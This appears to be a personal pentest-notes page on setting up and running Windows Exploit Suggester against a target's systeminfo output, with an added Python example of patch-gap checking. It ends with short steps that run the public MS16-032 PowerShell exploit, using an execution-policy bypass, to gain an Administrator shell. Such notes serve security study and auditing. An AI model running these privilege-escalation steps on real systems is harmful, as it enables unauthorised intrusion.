Windows Exploit Suggester

Original repo: https://github.com/AonCyberLabs/Windows-Exploit-Suggester

My fork: https://github.com/amandaguglieri/Windows-Exploit-Suggester

This tool compares a target's patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

We will create an environment running Python 2.7.18, which the tool requires:

# List installed pyenv Python versions (2.7.18 is missing here)
pyenv versions

# Install version 2.7.18
pyenv install 2.7.18

# Create a virtualenv that uses python2.7.18
pyenv virtualenv 2.7.18 tooling2

# Activate the env
pyenv activate tooling2

# Make sure you have the 2.7.18 python version running
python -V

# Install python dependencies
sudo wget https://files.pythonhosted.org/packages/28/84/27df240f3f8f52511965979aad7c7b77606f8fe41d4c90f2449e02172bb1/setuptools-2.0.tar.gz

sudo tar -xf setuptools-2.0.tar.gz
cd setuptools-2.0/
python setup.py install

cd ..

sudo wget https://files.pythonhosted.org/packages/42/85/25caf967c2d496067489e0bb32df069a8361e1fd96a7e9f35408e56b3aab/xlrd-1.0.0.tar.gz
sudo tar -xf xlrd-1.0.0.tar.gz
cd xlrd-1.0.0/
python setup.py install

Now we will gather the systeminfo command output from the target Windows host:

systeminfo

And we will save this on our Kali machine as systeminfo.txt.

Install the Windows Exploit Suggester:

git clone https://github.com/amandaguglieri/Windows-Exploit-Suggester.git

cd Windows-Exploit-Suggester

We then need to update our local copy of the Microsoft Vulnerability database. This command will save the contents to a local Excel file.

python windows-exploit-suggester.py --update

Output:

[*] initiating winsploit version 3.3...
[+] writing to file 2025-04-29-mssb.xls
[*] done

Running Windows Exploit Suggester:

python windows-exploit-suggester.py --database 2025-04-29-mssb.xls --systeminfo systeminfo.txt
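
To make the comparison concrete, here is an added Python 3 example (not code from Windows Exploit Suggester) of the core check for patch auditing: parse the systeminfo output, collect the installed hotfixes, and list the bulletins whose fixing KB is absent. The function names, the sample host and the bulletin table are assumptions, and every KB number is a constructed placeholder.

```python
import re

# Constructed systeminfo excerpt (not from a real host); KB numbers are placeholders.
SAMPLE_SYSTEMINFO = """\
Host Name:                 WS01
OS Name:                   Microsoft Windows 7 Professional
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
                           [03]: KB0000003
Network Card(s):           1 NIC(s) Installed.
                           [01]: Constructed Adapter
"""

# Constructed bulletin table: (bulletin id, affected product substring, fixing KB).
# The real tool reads this data from the downloaded bulletin spreadsheet; the KB
# values here are placeholders, and MSXX-* are made-up bulletin ids.
SAMPLE_BULLETINS = [
    ("MS16-032", "Windows 7", "KB0000009"),
    ("MSXX-001", "Windows 7", "KB0000002"),
    ("MSXX-002", "Windows 10", "KB0000010"),
]

def parse_systeminfo(text):
    """Return (os_name, set of installed KB ids) from systeminfo output."""
    os_name, hotfixes, in_hotfix = None, set(), False
    for line in text.splitlines():
        if line.startswith("OS Name:"):
            os_name = line.split(":", 1)[1].strip()
        elif line.startswith("Hotfix(s):"):
            in_hotfix = True               # indented KB entries follow this line
        elif in_hotfix and line[:1].isspace():
            match = re.search(r"\bKB\d+\b", line, re.IGNORECASE)
            if match:
                hotfixes.add(match.group(0).upper())
        else:
            in_hotfix = False              # next top-level field ends the list
    return os_name, hotfixes

def missing_bulletins(text, bulletins):
    """List bulletins that apply to the host OS and whose KB is not installed."""
    os_name, installed = parse_systeminfo(text)
    if os_name is None:
        raise ValueError("no 'OS Name:' line; is this systeminfo output?")
    return [bulletin for bulletin, product, kb in bulletins
            if product.lower() in os_name.lower() and kb.upper() not in installed]

if __name__ == "__main__":
    print(missing_bulletins(SAMPLE_SYSTEMINFO, SAMPLE_BULLETINS))
```

A bulletin reported this way is only a candidate: the check matches on product name and KB presence, so superseding updates and service-pack differences still have to be confirmed on the host.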

#### Exploiting MS16-032 with PowerShell PoC

We will use: https://www.exploit-db.com/exploits/39719

Set-ExecutionPolicy bypass -scope process
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032

And we obtain a cmd shell with Administrator-level privileges.

Last update: 2025-05-18
Created: May 18, 2025 16:41:27